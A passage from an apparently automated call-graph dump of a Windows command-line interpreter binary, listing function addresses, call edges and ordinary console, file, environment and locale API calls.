17038->17039 17040 7ff7ab146b2e 17039->17040 17040->16874 17042 7ff7ab146455 17041->17042 17043 7ff7ab146461 17041->17043 17042->17043 17044 7ff7ab146c5c 11 API calls 17042->17044 17045 7ff7ab1464f9 GetCurrentThreadId 17043->17045 17044->17043 17048 7ff7ab146561 17045->17048 17046 7ff7ab1465ea 17049 7ff7ab14666c OutputDebugStringW 17046->17049 17051 7ff7ab14660b 17046->17051 17056 7ff7ab145bf4 17046->17056 17047 7ff7ab1465f5 IsDebuggerPresent 17047->17046 17048->17046 17048->17047 17049->17051 17051->17038 17052 7ff7ab14742c 17051->17052 17053 7ff7ab14744a memset 17052->17053 17054 7ff7ab147444 17052->17054 17055 7ff7ab147489 17053->17055 17054->17053 17057 7ff7ab145e13 17056->17057 17060 7ff7ab145c2e 17056->17060 17058 7ff7ab138f80 7 API calls 17057->17058 17059 7ff7ab145e49 17058->17059 17059->17049 17060->17057 17061 7ff7ab145ca7 FormatMessageW 17060->17061 17062 7ff7ab145cfc 17061->17062 17063 7ff7ab145d1f 17061->17063 17085 7ff7ab1466bc 17062->17085 17064 7ff7ab1466bc _vsnwprintf 17063->17064 17066 7ff7ab145d1d 17064->17066 17067 7ff7ab145d54 GetCurrentThreadId 17066->17067 17068 7ff7ab1466bc _vsnwprintf 17066->17068 17069 7ff7ab1466bc _vsnwprintf 17067->17069 17070 7ff7ab145d51 17068->17070 17071 7ff7ab145d91 17069->17071 17070->17067 17071->17057 17072 7ff7ab1466bc _vsnwprintf 17071->17072 17073 7ff7ab145db9 17072->17073 17074 7ff7ab145dd4 17073->17074 17076 7ff7ab1466bc _vsnwprintf 17073->17076 17075 7ff7ab145def 17074->17075 17077 7ff7ab1466bc _vsnwprintf 17074->17077 17078 7ff7ab145dff 17075->17078 17079 7ff7ab145e15 17075->17079 17076->17074 17077->17075 17080 7ff7ab1466bc _vsnwprintf 17078->17080 17081 7ff7ab145e1d 17079->17081 17082 7ff7ab145e2b 17079->17082 17080->17057 17083 7ff7ab1466bc _vsnwprintf 17081->17083 17084 7ff7ab1466bc _vsnwprintf 17082->17084 17083->17057 17084->17057 17088 7ff7ab13363c 17085->17088 17089 7ff7ab133671 17088->17089 17090 7ff7ab133664 17088->17090 17089->17066 17092 7ff7ab133684 _vsnwprintf 17090->17092 17093 7ff7ab1336b7 17092->17093 17093->17089 17095 7ff7ab130877 17094->17095 17096 7ff7ab13085e 17094->17096 17097 7ff7ab130884 _wcsicmp 17095->17097 17099 7ff7ab130970 17095->17099 17096->16889 17096->16891 17098 7ff7ab1308a2 _wcsicmp 17097->17098 17107 7ff7ab130989 17097->17107 17100 7ff7ab1308c0 _wcsicmp 17098->17100 17098->17107 17115 7ff7ab133140 17099->17115 17103 7ff7ab1308de _wcsicmp 17100->17103 17100->17107 17101 7ff7ab13417c 154 API calls 17101->17107 17105 7ff7ab1308fc _wcsicmp 17103->17105 17106 7ff7ab13d8d3 GetCommandLineW 17103->17106 17105->17107 17108 7ff7ab13091a _wcsicmp 17105->17108 17111 7ff7ab13d8e5 rand 17106->17111 17107->17101 17141 7ff7ab1333f0 17107->17141 17145 7ff7ab126ee4 17107->17145 17179 7ff7ab139158 RtlCaptureContext RtlLookupFunctionEntry 17107->17179 17108->17099 17112 7ff7ab130934 _wcsicmp 17108->17112 17111->17107 17112->17111 17113 7ff7ab130952 _wcsicmp 17112->17113 17113->17099 17114 7ff7ab13d8f9 GetNumaHighestNodeNumber 17113->17114 17114->17107 17116 7ff7ab13e59e 17115->17116 17117 7ff7ab133184 GetSystemTime SystemTimeToFileTime FileTimeToLocalFileTime FileTimeToSystemTime 17115->17117 17184 7ff7ab148654 17116->17184 17118 7ff7ab13e5ed 17117->17118 17119 7ff7ab1331e0 17117->17119 17121 7ff7ab13e5fe 17118->17121 17128 7ff7ab13e750 17118->17128 17122 7ff7ab13e5a8 17119->17122 17123 7ff7ab1331ff 17119->17123 17195 7ff7ab135508 GetUserDefaultLCID 17121->17195 17190 7ff7ab133448 17122->17190 17125 7ff7ab1333f0 _vsnwprintf 17123->17125 17130 7ff7ab133247 17125->17130 17129 7ff7ab1333f0 _vsnwprintf 17128->17129 17131 7ff7ab13e748 17129->17131 17132 7ff7ab138f80 7 API calls 17130->17132 17138 7ff7ab13e5e8 17131->17138 17197 7ff7ab1334a0 17131->17197 17134 7ff7ab133266 17132->17134 17133 7ff7ab13e711 17135 7ff7ab135508 GetUserDefaultLCID 17133->17135 17134->17107 17136 7ff7ab13e716 GetTimeFormatW 17135->17136 17136->17131 17138->17138 17139 7ff7ab13e629 17139->17133 17139->17139 17140 7ff7ab13e6e7 memmove 17139->17140 17140->17139 17142 7ff7ab133421 17141->17142 17143 7ff7ab133433 17141->17143 17144 7ff7ab133684 _vsnwprintf 17142->17144 17143->17107 17144->17143 17146 7ff7ab126f30 GetSystemTime SystemTimeToFileTime FileTimeToLocalFileTime FileTimeToSystemTime 17145->17146 17172 7ff7ab126fbf 17145->17172 17148 7ff7ab126f90 17146->17148 17150 7ff7ab1442b6 17146->17150 17147 7ff7ab148654 9 API calls 17147->17172 17149 7ff7ab135508 GetUserDefaultLCID 17148->17149 17151 7ff7ab126f97 GetLocaleInfoW 17149->17151 17152 7ff7ab144322 realloc 17150->17152 17153 7ff7ab14433f 17150->17153 17156 7ff7ab123278 153 API calls 17150->17156 17151->17172 17152->17150 17152->17153 17154 7ff7ab1333f0 _vsnwprintf 17153->17154 17161 7ff7ab14437d 17154->17161 17155 7ff7ab135508 GetUserDefaultLCID 17157 7ff7ab127042 GetDateFormatW 17155->17157 17156->17150 17158 7ff7ab12707a 17157->17158 17159 7ff7ab135508 GetUserDefaultLCID 17158->17159 17165 7ff7ab12708a 17158->17165 17160 7ff7ab12714a GetDateFormatW 17159->17160 17162 7ff7ab1442a0 GetLastError 17160->17162 17163 7ff7ab127175 realloc 17160->17163 17167 7ff7ab1443ea 17161->17167 17173 7ff7ab1443fb 17161->17173 17162->17150 17163->17150 17166 7ff7ab12719c 17163->17166 17164 7ff7ab14427f memmove 17164->17172 17165->17161 17176 7ff7ab1270bd 17165->17176 17168 7ff7ab135508 GetUserDefaultLCID 17166->17168 17170 7ff7ab133448 153 API calls 17167->17170 17171 7ff7ab1271ae GetDateFormatW 17168->17171 17169 7ff7ab127020 memmove 17169->17172 17175 7ff7ab1443f9 17170->17175 17171->17162 17171->17172 17172->17147 17172->17155 17172->17164 17172->17169 17174 7ff7ab133448 153 API calls 17173->17174 17174->17175 17176->17175 17176->17176 17177 7ff7ab138f80 7 API calls 17176->17177 17178 7ff7ab127129 17177->17178 17178->17107 17180 7ff7ab1391d7 17179->17180 17181 7ff7ab139195 RtlVirtualUnwind 17179->17181 17244 7ff7ab138fa4 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 17180->17244 17181->17180 17185 7ff7ab148673 GetSystemTime 17184->17185 17186 7ff7ab148686 17184->17186 17187 7ff7ab1486cc SystemTimeToFileTime 17185->17187 17186->17187 17188 7ff7ab138f80 7 API calls 17187->17188 17189 7ff7ab1486ed 17188->17189 17189->17122 17191 7ff7ab13363c _vsnwprintf 17190->17191 17192 7ff7ab13347b 17191->17192 17193 7ff7ab1334a0 166 API calls 17192->17193 17194 7ff7ab133491 17193->17194 17194->17138 17196 7ff7ab135529 GetLocaleInfoW 17195->17196 17196->17139 17198 7ff7ab1334bf 17197->17198 17219 7ff7ab1334f5 17197->17219 17220 7ff7ab133578 _get_osfhandle 17198->17220 17201 7ff7ab13350d AcquireSRWLockShared _get_osfhandle WriteConsoleW 17203 7ff7ab133557 ReleaseSRWLockShared 17201->17203 17204 7ff7ab13e8d2 GetLastError 17201->17204 17202 7ff7ab1334cd 17227 7ff7ab1336ec _get_osfhandle 17202->17227 17206 7ff7ab1334e1 17203->17206 17207 7ff7ab13e8e5 GetLastError 17204->17207 17206->17207 17206->17219 17234 7ff7ab1301b8 _get_osfhandle GetFileType 17207->17234 17210 7ff7ab13e918 17239 7ff7ab14f318 _get_osfhandle GetFileType 17210->17239 17211 7ff7ab13e908 17212 7ff7ab123278 160 API calls 17211->17212 17212->17219 17214 7ff7ab13e91f 17215 7ff7ab13e931 17214->17215 17216 7ff7ab13e923 17214->17216 17240 7ff7ab14f1d8 17215->17240 17218 7ff7ab123278 160 API calls 17216->17218 17218->17219 17219->17138 17221 7ff7ab133599 GetFileType 17220->17221 17222 7ff7ab1334c9 17220->17222 17221->17222 17225 7ff7ab1335b1 17221->17225 17222->17201 17222->17202 17223 7ff7ab13e940 17224 7ff7ab1335c3 GetStdHandle 17226 7ff7ab1335d2 AcquireSRWLockShared GetConsoleMode ReleaseSRWLockShared 17224->17226 17225->17223 17225->17224 17225->17226 17226->17222 17228 7ff7ab13e95c WriteFile 17227->17228 17231 7ff7ab133731 17227->17231 17229 7ff7ab13e980 WideCharToMultiByte WriteFile 17228->17229 17229->17231 17232 7ff7ab1337a1 17229->17232 17230 7ff7ab133747 17230->17232 17233 7ff7ab13374b WideCharToMultiByte WriteFile 17230->17233 17231->17229 17231->17230 17231->17232 17232->17206 17233->17232 17235 7ff7ab1301eb 17234->17235 17237 7ff7ab130200 17234->17237 17235->17210 17235->17211 17236 7ff7ab130212 GetStdHandle 17238 7ff7ab130221 AcquireSRWLockShared GetConsoleMode ReleaseSRWLockShared 17236->17238 17237->17235 17237->17236 17237->17238 17238->17235 17239->17214 17241 7ff7ab14f1e8 17240->17241 17242 7ff7ab14f220 17241->17242 17243 7ff7ab123278 166 API calls 17241->17243 17242->17219 17243->17242 17277 7ff7ab12cd90 17245->17277 17248 7ff7ab12b9a6 17248->16896 17249 7ff7ab14e91c 198 API calls 17250 7ff7ab12b9b1 memset 17249->17250 17252 7ff7ab12ca40 17 API calls 17250->17252 17256 7ff7ab12ba4c 17252->17256 17253 7ff7ab13c3a8 17254 7ff7ab12b998 199 API calls 17253->17254 17263 7ff7ab13c41a 17254->17263 17255 7ff7ab12badb 17255->17253 17258 7ff7ab12bcef GetFileAttributesW 17255->17258 17260 7ff7ab12bb05 17255->17260 17256->17253 17256->17255 17257 7ff7ab12ba80 wcschr 17256->17257 17259 7ff7ab12baa0 wcschr 17256->17259 17256->17260 17264 7ff7ab12bb47 17256->17264 17257->17255 17257->17256 17258->17260 17259->17256 17262 7ff7ab12bb29 _wcsicmp 17260->17262 17260->17264 17262->17260 17264->17253 17265 7ff7ab12bb6b 17264->17265 17283 7ff7ab1288a8 17264->17283 17265->17253 17268 7ff7ab12bb92 17265->17268 17266 7ff7ab12bc82 iswspace 17266->17265 17267 7ff7ab12bc99 wcschr 17266->17267 17267->17265 17269 7ff7ab12bc46 17267->17269 17270 7ff7ab12bbee 17268->17270 17271 7ff7ab12bbe2 ??_V@YAXPEAX 17268->17271 17269->17253 17269->17265 17269->17266 17272 7ff7ab138f80 7 API calls 17270->17272 17271->17270 17273 7ff7ab12bc01 17272->17273 17273->16896 17287 7ff7ab14e9b4 17274->17287 17278 7ff7ab13c84e 17277->17278 17279 7ff7ab12cda1 GetProcessHeap HeapAlloc 17277->17279 17281 7ff7ab123278 164 API calls 17278->17281 17279->17278 17280 7ff7ab12b9a1 17279->17280 17280->17248 17280->17249 17282 7ff7ab13c858 17281->17282 17284 7ff7ab1288fc 17283->17284 17286 7ff7ab1288cf 17283->17286 17284->17269 17285 7ff7ab1288df _wcsicmp 17285->17286 17286->17284 17286->17285 17289 7ff7ab14ea0f 17287->17289 17290 7ff7ab14e9d9 17287->17290 17288 7ff7ab14ea67 17317 7ff7ab14c978 17288->17317 17289->17288 17312 7ff7ab12af98 17289->17312 17299 7ff7ab126a48 17290->17299 17294 7ff7ab14ea6c 17295 7ff7ab14eaae 17294->17295 17327 7ff7ab12d208 17294->17327 17296 7ff7ab14eacf 17295->17296 17297 7ff7ab133a0c 2 API calls 17295->17297 17297->17295 17300 7ff7ab126b23 17299->17300 17302 7ff7ab126a51 17299->17302 17300->17289 17301 7ff7ab14417c 17401 7ff7ab14ec14 memset 17301->17401 17302->17300 17302->17301 17303 7ff7ab126ab2 17302->17303 17332 7ff7ab133c24 17303->17332 17314 7ff7ab12afb1 17312->17314 17313 7ff7ab12afdb 17313->17289 17314->17313 17316 7ff7ab12d208 _close 17314->17316 17453 7ff7ab12b038 _dup2 17314->17453 17316->17314 17318 7ff7ab14ca9e 17317->17318 17319 7ff7ab14c98e 17317->17319 17318->17294 17320 7ff7ab14ee4c TerminateProcess GetLastError 17319->17320 17326 7ff7ab14c9b3 17319->17326 17320->17319 17321 7ff7ab135cb4 7 API calls 17321->17326 17322 7ff7ab12d208 _close 17322->17326 17323 7ff7ab14ca21 _get_osfhandle FlushFileBuffers 17324 7ff7ab12b038 _dup2 17323->17324 17324->17326 17325 7ff7ab12b038 _dup2 17325->17326 17326->17318 17326->17321 17326->17322 17326->17323 17326->17325 17328 7ff7ab12d246 17327->17328 17330 7ff7ab12d211 17327->17330 17328->17294 17329 7ff7ab12d238 _close 17329->17328 17330->17329 17331 7ff7ab13ca0e 17330->17331 17331->17294 17333 7ff7ab133c67 17332->17333 17335 7ff7ab12ca40 17 API calls 17333->17335 17380 7ff7ab13412c 17333->17380 17334 7ff7ab138f80 7 API calls 17336 7ff7ab126abf GetProcessHeap RtlFreeHeap 17334->17336 17337 7ff7ab133c94 17335->17337 17397 7ff7ab126b84 SetEnvironmentStringsW GetProcessHeap RtlFreeHeap 17336->17397 17338 7ff7ab13ec97 17337->17338 17339 7ff7ab12b900 146 API calls 17337->17339 17340 7ff7ab13855c ??_V@YAXPEAX 17338->17340 17341 7ff7ab133ca7 17339->17341 17342 7ff7ab13eca1 17340->17342 17341->17338 17343 7ff7ab133cb8 GetCurrentDirectoryW towupper iswalpha 17341->17343 17345 7ff7ab133fb8 17343->17345 17346 7ff7ab133d68 17343->17346 17348 7ff7ab133fc6 GetLastError 17345->17348 17346->17345 17347 7ff7ab133d72 towupper GetFullPathNameW 17346->17347 17347->17348 17349 7ff7ab133dd3 17347->17349 17440 7ff7ab13855c 17348->17440 17351 7ff7ab133fe0 17349->17351 17364 7ff7ab133de3 17349->17364 17353 7ff7ab13855c ??_V@YAXPEAX 17351->17353 17352 7ff7ab1340fe 17354 7ff7ab13855c ??_V@YAXPEAX 17352->17354 17355 7ff7ab133ffb _local_unwind 17353->17355 17356 7ff7ab134108 _local_unwind 17354->17356 17357 7ff7ab13400c GetLastError 17355->17357 17360 7ff7ab133f98 17356->17360 17358 7ff7ab134028 17357->17358 17359 7ff7ab133e95 17357->17359 17358->17359 17361 7ff7ab134031 17358->17361 17362 7ff7ab133ecf 17359->17362 17422 7ff7ab132978 17359->17422 17443 7ff7ab12ff70 17360->17443 17366 7ff7ab13855c ??_V@YAXPEAX 17361->17366 17368 7ff7ab133f08 17362->17368 17369 7ff7ab133ed5 GetFileAttributesW 17362->17369 17364->17352 17365 7ff7ab133e66 GetFileAttributesW 17364->17365 17365->17357 17365->17359 17371 7ff7ab13403b _local_unwind 17366->17371 17376 7ff7ab133f1e SetCurrentDirectoryW 17368->17376 17381 7ff7ab133f46 17368->17381 17373 7ff7ab134067 GetLastError 17369->17373 17374 7ff7ab133efd 17369->17374 17377 7ff7ab13404c 17371->17377 17372 7ff7ab133ec7 17372->17362 17372->17377 17378 7ff7ab13855c ??_V@YAXPEAX 17373->17378 17374->17368 17379 7ff7ab13409d 17374->17379 17375 7ff7ab13855c ??_V@YAXPEAX 17375->17380 17376->17381 17382 7ff7ab1340b8 GetLastError 17376->17382 17383 7ff7ab13855c ??_V@YAXPEAX 17377->17383 17384 7ff7ab13408c _local_unwind 17378->17384 17385 7ff7ab13855c ??_V@YAXPEAX 17379->17385 17380->17334 17435 7ff7ab13498c 17381->17435 17386 7ff7ab13855c ??_V@YAXPEAX 17382->17386 17389 7ff7ab134056 _local_unwind 17383->17389 17384->17379 17390 7ff7ab1340a7 _local_unwind 17385->17390 17391 7ff7ab1340d2 _local_unwind 17386->17391 17389->17373 17390->17382 17392 7ff7ab1340e3 17391->17392 17394 7ff7ab13855c ??_V@YAXPEAX 17392->17394 17393 7ff7ab133f6f 17395 7ff7ab13417c 146 API calls 17393->17395 17396 7ff7ab1340ed _local_unwind 17394->17396 17395->17360 17396->17352 17398 7ff7ab134a14 5 API calls 17397->17398 17399 7ff7ab126ae8 17398->17399 17400 7ff7ab126b30 GetProcessHeap RtlFreeHeap GetProcessHeap RtlFreeHeap 17399->17400 17402 7ff7ab12ca40 17 API calls 17401->17402 17403 7ff7ab14ec96 17402->17403 17404 7ff7ab14edf7 17403->17404 17407 7ff7ab13081c 166 API calls 17403->17407 17405 7ff7ab14ee0a ??_V@YAXPEAX 17404->17405 17406 7ff7ab14ee16 17404->17406 17405->17406 17408 7ff7ab138f80 7 API calls 17406->17408 17409 7ff7ab14ecca 17407->17409 17410 7ff7ab144190 17408->17410 17411 7ff7ab14ecfb 17409->17411 17412 7ff7ab14ecd2 SetCurrentDirectoryW 17409->17412 17415 7ff7ab13498c 8 API calls 17411->17415 17413 7ff7ab14ece9 SetErrorMode 17412->17413 17414 7ff7ab14edd4 17412->17414 17413->17411 17416 7ff7ab13417c 166 API calls 17414->17416 17417 7ff7ab14ed89 SetCurrentDirectoryW 17415->17417 17416->17404 17418 7ff7ab14edac GetLastError 17417->17418 17419 7ff7ab14edc1 17417->17419 17420 7ff7ab123278 166 API calls 17418->17420 17419->17414 17421 7ff7ab14edc6 SetErrorMode 17419->17421 17420->17419 17421->17414 17423 7ff7ab1329b9 17422->17423 17424 7ff7ab132a1e FindFirstFileW 17423->17424 17426 7ff7ab1329ed 17423->17426 17427 7ff7ab13e3f7 17423->17427 17428 7ff7ab132aeb _wcsnicmp 17423->17428 17431 7ff7ab13e3d6 _wcsicmp 17423->17431 17432 7ff7ab132a9d memmove 17423->17432 17433 7ff7ab13e404 memmove 17423->17433 17425 7ff7ab132a44 FindClose 17424->17425 17424->17427 17425->17423 17429 7ff7ab138f80 7 API calls 17426->17429 17427->17372 17428->17423 17430 7ff7ab132a02 17429->17430 17430->17372 17431->17423 17431->17427 17432->17423 17433->17427 17436 7ff7ab1349ba SetEnvironmentVariableW GetProcessHeap RtlFreeHeap 17435->17436 17437 7ff7ab1349a4 17435->17437 17447 7ff7ab134a14 GetEnvironmentStringsW 17436->17447 17437->17436 17441 7ff7ab138574 ??_V@YAXPEAX 17440->17441 17442 7ff7ab138583 17440->17442 17441->17442 17442->17351 17444 7ff7ab12ff7c 17443->17444 17445 7ff7ab12ffdb 17443->17445 17444->17445 17446 7ff7ab12ffb5 GetProcessHeap RtlFreeHeap 17444->17446 17445->17375 17446->17445 17448 7ff7ab133f67 17447->17448 17449 7ff7ab134a40 GetProcessHeap HeapAlloc 17447->17449 17448->17392 17448->17393 17451 7ff7ab134a91 memmove 17449->17451 17452 7ff7ab134a9f FreeEnvironmentStringsW 17449->17452 17451->17452 17452->17448 17454 7ff7ab12b061 17453->17454 17454->17314 17454->17454 17457 7ff7ab13272d 17456->17457 17458 7ff7ab132724 17456->17458 17457->16960 17458->17457 17459 7ff7ab13274b 17458->17459 17460 7ff7ab1327ef _wcsicmp 17458->17460 17461 7ff7ab132779 CreateFileW 17459->17461 17462 7ff7ab132817 CreateFileW 17459->17462 17460->17459 17463 7ff7ab132796 _open_osfhandle 17461->17463 17466 7ff7ab13e2f0 GetLastError 17461->17466 17462->17461 17462->17463 17465 7ff7ab132863 17463->17465 17467 7ff7ab1327b6 17463->17467 17468 7ff7ab1301b8 6 API calls 17465->17468 17466->17457 17467->16960 17469 7ff7ab13286a 17468->17469 17469->17467 17470 7ff7ab132872 GetFileSize 17469->17470 17470->17467 17471 7ff7ab132895 SetFilePointer 17470->17471 17472 7ff7ab13e31a GetLastError 17471->17472 17473 7ff7ab1328d2 ReadFile 17471->17473 17472->17473 17474 7ff7ab13e334 17472->17474 17475 7ff7ab13e362 SetFilePointer 17473->17475 17476 7ff7ab132901 17473->17476 17477 7ff7ab13e339 _close 17474->17477 17478 7ff7ab13e34d CloseHandle 17474->17478 17479 7ff7ab13e38e SetFilePointer 17475->17479 17476->17467 17476->17479 17477->17457 17478->17457 17479->17467 17480->16982 17481->16980 17483 7ff7ab133578 6 API calls 17482->17483 17484 7ff7ab1232e8 17483->17484 17485 7ff7ab1232f0 _get_osfhandle GetConsoleScreenBufferInfo 17484->17485 17486 7ff7ab12331d 17484->17486 17485->17486 17518 7ff7ab123410 17486->17518 17488 7ff7ab1233a8 17489 7ff7ab123498 17488->17489 17494 7ff7ab1233b0 17488->17494 17496 7ff7ab1411ff 17488->17496 17492 7ff7ab12349d wcschr 17489->17492 17493 7ff7ab1234b4 17489->17493 17490 7ff7ab1336ec 6 API calls 17509 7ff7ab12333d 17490->17509 17491 7ff7ab123368 WriteConsoleW 17497 7ff7ab1411cc GetLastError 17491->17497 17491->17509 17492->17489 17492->17493 17498 7ff7ab14121d GetProcessHeap HeapAlloc 17493->17498 17499 7ff7ab1234c4 FormatMessageW 17493->17499 17504 7ff7ab138f80 7 API calls 17494->17504 17495 7ff7ab141057 GetConsoleScreenBufferInfo 17501 7ff7ab141079 WriteConsoleW 17495->17501 17495->17509 17534 7ff7ab134c1c 17496->17534 17497->17509 17500 7ff7ab1234ef 17498->17500 17516 7ff7ab14124f FormatMessageW GetProcessHeap RtlFreeHeap 17498->17516 17499->17500 17506 7ff7ab138f80 7 API calls 17500->17506 17507 7ff7ab1410a8 9 API calls 17501->17507 17501->17509 17503 7ff7ab1411df GetLastError 17503->17488 17508 7ff7ab1233be 17504->17508 17505 7ff7ab123400 17505->17503 17511 7ff7ab1234ff 17506->17511 17507->17509 17512 7ff7ab141181 17507->17512 17508->17017 17509->17488 17509->17490 17509->17491 17509->17495 17509->17497 17509->17503 17509->17505 17511->17017 17533 7ff7ab14bde4 EnterCriticalSection LeaveCriticalSection 17512->17533 17513 7ff7ab1412cd _ultoa GetACP 17538 7ff7ab130460 17513->17538 17516->17513 17519 7ff7ab12345c FormatMessageW 17518->17519 17520 7ff7ab1412cd _ultoa GetACP 17518->17520 17519->17520 17529 7ff7ab12348b 17519->17529 17521 7ff7ab130460 17520->17521 17522 7ff7ab1412f9 MultiByteToWideChar 17521->17522 17523 7ff7ab12349d wcschr 17524 7ff7ab1234b4 17523->17524 17523->17529 17525 7ff7ab14121d GetProcessHeap HeapAlloc 17524->17525 17526 7ff7ab1234c4 FormatMessageW 17524->17526 17527 7ff7ab1234ef 17525->17527 17532 7ff7ab14124f FormatMessageW GetProcessHeap RtlFreeHeap 17525->17532 17526->17527 17528 7ff7ab138f80 7 API calls 17527->17528 17531 7ff7ab1234ff 17528->17531 17529->17523 17529->17524 17531->17509 17532->17520 17535 7ff7ab134c24 17534->17535 17537 7ff7ab134c2f exit 17535->17537 17540 7ff7ab134c50 17535->17540 17539 7ff7ab130472 MultiByteToWideChar 17538->17539 17546 7ff7ab134cb0 17540->17546 17543 7ff7ab134c6c 17543->17535 17544 7ff7ab133c24 164 API calls 17545 7ff7ab134c84 GetProcessHeap RtlFreeHeap 17544->17545 17545->17543 17547 7ff7ab134cda 17546->17547 17550 7ff7ab134cfa 17546->17550 17548 7ff7ab138f80 7 API calls 17547->17548 17549 7ff7ab134c64 17548->17549 17549->17543 17549->17544 17550->17547 17551 7ff7ab13eefe realloc 17550->17551 17551->17547 18440 7ff7ab134850 18441 7ff7ab134861 18440->18441 18442 7ff7ab13ed44 18440->18442 18447 7ff7ab134878 18441->18447 18444 7ff7ab134878 410 API calls 18442->18444 18446 7ff7ab13ed49 18444->18446 18449 7ff7ab13eda0 18447->18449 18451 7ff7ab13489f 18447->18451 18448 7ff7ab12d3f0 223 API calls 18448->18449 18449->18448 18465 7ff7ab13edcf 18449->18465 18539 7ff7ab149114 18449->18539 18451->18449 18452 7ff7ab1348d1 _wcsnicmp 18451->18452 18453 7ff7ab1348f2 _wcsnicmp 18452->18453 18454 7ff7ab134974 18452->18454 18456 7ff7ab13ed60 18453->18456 18463 7ff7ab134913 18453->18463 18472 7ff7ab136c00 18454->18472 18502 7ff7ab1493e8 18456->18502 18457 7ff7ab134866 18459 7ff7ab123278 166 API calls 18461 7ff7ab13ee59 18459->18461 18460 7ff7ab13492b 18464 7ff7ab134939 wcschr 18460->18464 18471 7ff7ab13ee15 18460->18471 18462 7ff7ab13ed80 wcsrchr 18462->18460 18463->18460 18463->18462 18463->18471 18466 7ff7ab134952 18464->18466 18467 7ff7ab13497f 18464->18467 18469 7ff7ab131ea0 8 API calls 18465->18469 18465->18471 18470 7ff7ab13498c 8 API calls 18466->18470 18485 7ff7ab1491b8 18467->18485 18469->18471 18470->18457 18471->18459 18473 7ff7ab13f900 18472->18473 18474 7ff7ab136c1d 18472->18474 18475 7ff7ab123278 166 API calls 18473->18475 18474->18473 18477 7ff7ab131ea0 8 API calls 18474->18477 18476 7ff7ab13f912 18475->18476 18478 7ff7ab136c2b 18477->18478 18545 7ff7ab1363c8 18478->18545 18480 7ff7ab136c8a 18481 7ff7ab136c97 18480->18481 18484 7ff7ab133448 166 API calls 18480->18484 18481->18457 18483 7ff7ab123278 166 API calls 18483->18480 18484->18473 18486 7ff7ab149215 18485->18486 18487 7ff7ab1491e6 18485->18487 18488 7ff7ab1309f4 2 API calls 18486->18488 18489 7ff7ab1491ee fprintf 18487->18489 18490 7ff7ab14921a 18488->18490 18491 7ff7ab14920b 18489->18491 18492 7ff7ab12b900 166 API calls 18490->18492 18491->18457 18493 7ff7ab149222 18492->18493 18493->18491 18494 7ff7ab14922a wcsrchr 18493->18494 18496 7ff7ab149243 18494->18496 18495 7ff7ab1492bf 18497 7ff7ab123278 166 API calls 18495->18497 18499 7ff7ab1492d6 18495->18499 18496->18495 18498 7ff7ab14927c _wcsnicmp 18496->18498 18501 7ff7ab133448 166 API calls 18496->18501 18497->18499 18498->18496 18500 7ff7ab12ff70 2 API calls 18499->18500 18500->18491 18501->18496 18503 7ff7ab12b900 166 API calls 18502->18503 18504 7ff7ab14942d 18503->18504 18537 7ff7ab149631 18504->18537 18659 7ff7ab1333a8 18504->18659 18506 7ff7ab138f80 7 API calls 18508 7ff7ab149659 18506->18508 18508->18457 18509 7ff7ab123278 166 API calls 18509->18537 18510 7ff7ab14947a wcschr 18511 7ff7ab14949b 18510->18511 18538 7ff7ab149638 18510->18538 18513 7ff7ab1333a8 iswspace 18511->18513 18512 7ff7ab1333a8 iswspace 18514 7ff7ab14945d wcsrchr 18512->18514 18516 7ff7ab1494a8 18513->18516 18514->18510 18515 7ff7ab149476 18514->18515 18515->18510 18517 7ff7ab1494d2 18516->18517 18518 7ff7ab1333a8 iswspace 18516->18518 18519 7ff7ab1494e0 GetStdHandle GetConsoleMode 18517->18519 18517->18538 18520 7ff7ab1494b9 wcsrchr 18518->18520 18521 7ff7ab14950c SetConsoleMode 18519->18521 18522 7ff7ab149525 GetStdHandle GetConsoleMode 18519->18522 18520->18517 18521->18522 18523 7ff7ab14956a 18522->18523 18524 7ff7ab149551 SetConsoleMode 18522->18524 18525 7ff7ab123240 166 API calls 18523->18525 18524->18523 18526 7ff7ab14957c GetStdHandle 18525->18526 18527 7ff7ab148450 367 API calls 18526->18527 18528 7ff7ab1495ab 18527->18528 18529 7ff7ab1495da SetConsoleMode 18528->18529 18530 7ff7ab1495f1 18528->18530 18529->18530 18531 7ff7ab14960d 18530->18531 18532 7ff7ab1495f6 SetConsoleMode 18530->18532 18533 7ff7ab14961e 18531->18533 18534 7ff7ab149633 18531->18534 18531->18537 18532->18531 18536 7ff7ab13498c 8 API calls 18533->18536 18535 7ff7ab139158 7 API calls 18534->18535 18535->18538 18536->18537 18537->18506 18538->18509 18540 7ff7ab14912d 18539->18540 18543 7ff7ab149159 18539->18543 18541 7ff7ab149135 fprintf 18540->18541 18542 7ff7ab149152 18541->18542 18542->18449 18543->18542 18544 7ff7ab133448 166 API calls 18543->18544 18544->18543 18550 7ff7ab13684c 18545->18550 18547 7ff7ab13641f 18547->18480 18547->18483 18548 7ff7ab1363f3 18548->18547 18549 7ff7ab13684c 188 API calls 18548->18549 18549->18548 18551 7ff7ab136877 18550->18551 18553 7ff7ab136962 18551->18553 18568 7ff7ab136a28 18551->18568 18555 7ff7ab13f83b 18553->18555 18611 7ff7ab136120 18553->18611 18557 7ff7ab1369b7 wcschr 18557->18553 18558 7ff7ab1368dc 18557->18558 18558->18553 18559 7ff7ab1368f4 18558->18559 18560 7ff7ab13684c 187 API calls 18559->18560 18561 7ff7ab136913 18560->18561 18567 7ff7ab13695a 18561->18567 18577 7ff7ab135d20 18561->18577 18567->18548 18573 7ff7ab136a57 18568->18573 18569 7ff7ab1368a3 18569->18553 18569->18557 18569->18558 18570 7ff7ab136a70 iswdigit 18570->18569 18571 7ff7ab136a87 wcschr 18570->18571 18571->18569 18572 7ff7ab136aa6 wcschr 18571->18572 18572->18569 18574 7ff7ab136ac5 18572->18574 18573->18569 18573->18570 18574->18569 18575 7ff7ab136ad9 wcschr 18574->18575 18575->18569 18576 7ff7ab136af4 wcschr 18575->18576 18576->18569 18576->18574 18578 7ff7ab12cd90 166 API calls 18577->18578 18579 7ff7ab135d4e 18578->18579 18580 7ff7ab13f4d4 18579->18580 18582 7ff7ab135d5a 18579->18582 18581 7ff7ab123278 166 API calls 18580->18581 18583 7ff7ab13f4de 18581->18583 18617 7ff7ab133a90 18582->18617 18586 7ff7ab12ff70 2 API calls 18587 7ff7ab135d7e 18586->18587 18588 7ff7ab135d9a 18587->18588 18589 7ff7ab135d83 wcstol 18587->18589 18590 7ff7ab136b68 18588->18590 18589->18588 18593 7ff7ab136b73 18590->18593 18591 7ff7ab136941 18591->18567 18594 7ff7ab136068 18591->18594 18592 7ff7ab13f899 printf 18592->18591 18593->18591 18593->18592 18595 7ff7ab12cd90 166 API calls 